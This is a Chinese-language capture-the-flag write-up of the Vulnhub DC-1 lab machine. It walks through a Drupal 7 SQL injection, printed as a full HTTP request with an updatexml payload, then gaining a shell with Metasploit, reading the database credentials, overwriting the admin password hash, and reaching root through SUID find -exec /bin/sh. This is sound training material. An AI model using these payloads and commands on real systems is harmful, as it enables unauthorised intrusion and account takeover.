【Vulnhub】DC-1靶机

 

一、信息收集

　　1.1 环境

　　　　kali ： 192.168.124.141 

　　　　DC-1 ： 192.168.124.150 

　　1.2 nmap进行扫描 ：nmap -sV 192.168.124.150

IP ： 192.168.124.150
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
111/tcp open  rpcbind 2-4 (RPC #100000)
MAC Address: 00:0C:29:17:19:2E (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

　　发现有22端口 ，先拿hydra爆破发现也没爆破出来 。

　　登录web页面 看看有没有有用，发现web指纹。

 

 　　搜索了一下发现Drupal 7.0是存在SQL注入漏洞的，利用burpsuite抓包发到repeater模块，经过证实是可以使用user(),database()等内置函数的，但是后续进行爆表爆字段发现注入失败，一直在报错。

POST /node?destination=node HTTP/1.1
Host: 192.168.124.150
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://192.168.124.150
Connection: keep-alive
Referer: http://192.168.124.150/
Cookie: has_js=1
Upgrade-Insecure-Requests: 1

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a

 

 上面手注无果，不过已经是知道有SQL注入漏洞了，看前辈文章提示发现可以利用Metasploit。

kali利用msf过程：

 

 选择这个存在SQL注入的攻击模块

 

 run执行，之后获得一个shell环境

之后执行python脚本获得一个类似于terminal环境的shell

 

当前权限为www-data ，同时当前目录下有flag1

 

 

 获得flag1：Every good CMS needs a config file - and so do you.

根据提示需要看配置文件，但是看web.config后没发现有用的地方，查看前辈文章，发现需要找类似于settings.php的文件或者config.php的文件，那就进行模糊查找看看。

find -name '*set*.php'

 

 发现应该是 sites/default/settings.php

cat看一下。获得flag2；获得MySQL数据库账号密码。

 

 连接数据库看一下，mysql -u dbuser -p

R0ck3t

进入数据库，那就脱裤看看 （刺激:) ）

 

 就俩库，应该是drupaldb里应该有什么值得鼓捣的东西

发现里面有个users表，查看一下表里的内容

 

 应该是web页面的登陆账号密码，但是密码进行了特殊加密。此时卡住 Orz

看前辈文章得知需要知道drupal加密的方式,将自己进行加密后的密码放到数据库里，或者直接修改已存在的用户的密码。

通过查询发现:

加密方式文件为： /includes/password.inc

加密文件（可执行）为： /scripts/password-hash.sh

利用方式：

执行

./password-hash.sh password

即可获得加密过的password

PS：此处需要提前将includes目录全部复制到scripts目录下才可进行加密

进入scripts目录，执行： cp -r ../includes ./

 

 加密 123     ./password-hash.sh 123

修改admin用户的密码为123：

数据库中执行

update users

Set pass='$S$Ddw9oMOm2nfFPozoI.HYcdLo6jJIyLQHfmx8shTmNq1m873jzuXr'

where name='admin'; 

修改好后即可用123登录web界面，瞎点了点发现了flag3

 

 

flag3：

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

此处提示提到了 shadow文件 和exec命令

Shadow肯定是没权限看了，先看看passwd吧

 

 发现flag4，进入/home/flag4目录下发现flag4.txt

 

 根据提示，想拿最后flag需要root权限，所以还是需要提权。

根据前辈提示此处需要进行SUID提权 ，结合之前的flag所以应该是结合find命令和-exec     ---Orz

SUID提权原理：如果find本身具有suid的权限，因此通过find执行的命令就是root权限。

 

关于SUID：SUID (Set owner User ID up on execution) 是给予文件的一个特殊类型的文件权限。在 Linux/Unix中，当一个程序运行的时候， 程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的（程序/文件）所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候，将获取文件所有者的权限以及所有者的UID和GID。

SUID提权：

 https://www.cnblogs.com/junsec/p/11652723.html

首先执行

 find / -perm -u=s -type f 2>/dev/null  查找suid文件 

命令解释：

/表示从文件系统的顶部（根）开始并找到每个目录
-perm 表示搜索随后的权限
-u = s表示查找root用户拥有的文件
-type表示我们正在寻找的文件类型
f 表示常规文件，而不是目录或特殊文件
2表示该进程的第二个文件描述符，即stderr（标准错误）
>表示重定向
/ dev / null是一个特殊的文件系统对象，它将丢弃写入其中的所有内容。

利用find命令进行SUID 提权：

利用方式：find ./ aaa -exec '/bin/sh' \;

 

 已提升到root权限，拿到final flag

 

 总结：

0x01：信息收集，22扫描爆破无果；扫描web指纹发现drupal7存在sql漏洞
0x02：利用metasploit并配合python脚本弹shell
0x03：依据flag1提示，找到setting配置文件获得mysql数据库账号；拿到flag2
0x04：根据前辈提示获取drupal数据库加密方式添加/修改 获得web页面账号
0x05：在web页面拿到flag3 根据提示需要利用find -exec shadow等进行进一步渗透
0x06：查看passwd文件看到flag4用户，在home/flag4拿到flag4得知必须要提权至root
0x07：根据前辈的文章提示需要利用SUID进行提权，利用find提权之后拿到最终flag

 后续：

由于想了解msf是怎样建立shell的，特地去重新抓包：（下面纯属小白个人理解，欢迎大佬评论指正）

攻击流量：

 

通过解码分析，是通过insert into 插入数据，数据内容为php代码，应该是写入了木马。